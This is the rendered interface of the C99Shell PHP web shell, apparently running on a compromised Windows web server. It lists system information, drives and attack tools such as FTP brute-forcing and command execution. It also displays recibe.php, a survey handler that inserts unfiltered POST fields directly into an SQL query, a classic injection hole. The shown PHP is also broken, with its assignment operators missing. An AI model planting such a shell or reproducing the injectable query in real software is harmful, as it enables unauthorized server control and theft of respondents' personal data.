!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\prueba\encuestaRMCAB\   drwxrwxrwx
Free 8.8 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     recibe.php (1.4 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php
require_once('conn/conexion.php'); 

$fecha $_POST['fecha'];
$genero $_POST['genero'];
$edad $_POST['edad'];
$estrato $_POST['estrato'];
$educacion $_POST['educacion'];
$correo $_POST['correo'];
$contacto $_POST['contacto'];
$localidad $_POST['localidad'];
$entero $_POST['entero'];
$enterootro $_POST['enterootro'];
$localidadarbol $_POST['localidadarbol'];
$edadarbol $_POST['edadarbol'];
$direccionarbol $_POST['direccionarbol'];
$porquearbol $_POST['porquearbol'];
$nombrefotografo $_POST['nombrefotografo'];
$obtuvofotografia $_POST['obtuvofotografia'];
$titulofotografia $_POST['titulofotografia'];
$fecha_cumple $_POST['fecha_cumple'];


$sql3 "INSERT INTO EncuestaRMCAB(
`id` ,
`fecha` ,
`genero` ,
`edad` ,
`estrato` ,
`educacion` ,
`correo` ,
`contacto` ,
`localidad` ,
`entero` ,
`enterootro` ,
`localidadarbol` ,
`edadarbol` ,
`direccionarbol` ,
`porquearbol` ,
`nombrefotografo` ,
`obtuvofotografia` ,
`titulofotografia` ,
`fecha_cumple` 
)
VALUES (
NULL , '
$fecha', '$genero', '$edad', '$estrato', '$educacion', '$correo', '$contacto', '$localidad', '$entero', '$enterootro','$localidadarbol','$edadarbol','$direccionarbol','$porquearbol','$nombrefotografo','$obtuvofotografia','$titulofotografia','$fecha_cumple')";

$resultado=mysql_query($sql3);

echo 
"Datos enviados satisfactoriamente, Gracias";



?>
<p>&nbsp;</p>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--